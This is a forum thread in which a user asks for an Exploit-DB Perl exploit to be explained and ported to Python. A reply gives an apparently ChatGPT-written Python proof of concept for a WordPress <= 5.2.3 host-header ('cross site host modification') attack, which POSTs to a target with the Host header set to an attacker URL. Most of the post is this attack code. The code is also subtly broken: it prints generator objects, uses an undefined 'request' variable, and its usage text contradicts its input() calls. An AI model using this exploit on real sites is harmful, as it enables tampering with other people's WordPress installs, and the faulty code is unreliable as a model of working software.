Exploit in perl This is the exploit on exploit DB for cross site host modification in Perl. Can anyone please tell me what is this doing and how it is doing. Basically I wanted the code in python for me to understand from the code how we bypass the WSF. Please can someone tell me how we are exploiting this or give me this code in python so I can try to reverse engineer.
I was very lazy and let chatGPT do it
import requests
import random
def rand_ua(category):
user_agents = {
"browsers": [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1",
],
}
return random.choice(user_agents[category])
host = input("Enter the host URL: ")
attacker = input("Enter the attacker URL: ")
if not host.startswith("http"):
print("# e.g. python3 script.py https://target:port/ default-vhost.com")
exit()
print("# Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit")
print("# ====================================================================================")
print("# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>")
user_agent = rand_ua("browsers")
headers = {
"User-Agent": user_agent,
"Content-Type": "application/x-www-form-urlencoded",
"Host": attacker,
}
response = requests.post(host, headers=headers, data=" ")
if response.status_code == 401:
print("# 401 Unauthorized!")
exit()
print("# > {} => {}".format(key, value) for key, value in request.headers.items())
print("# < {} => {}".format(key, value) for key, value in response.headers.items())
print("# ====================================================================================")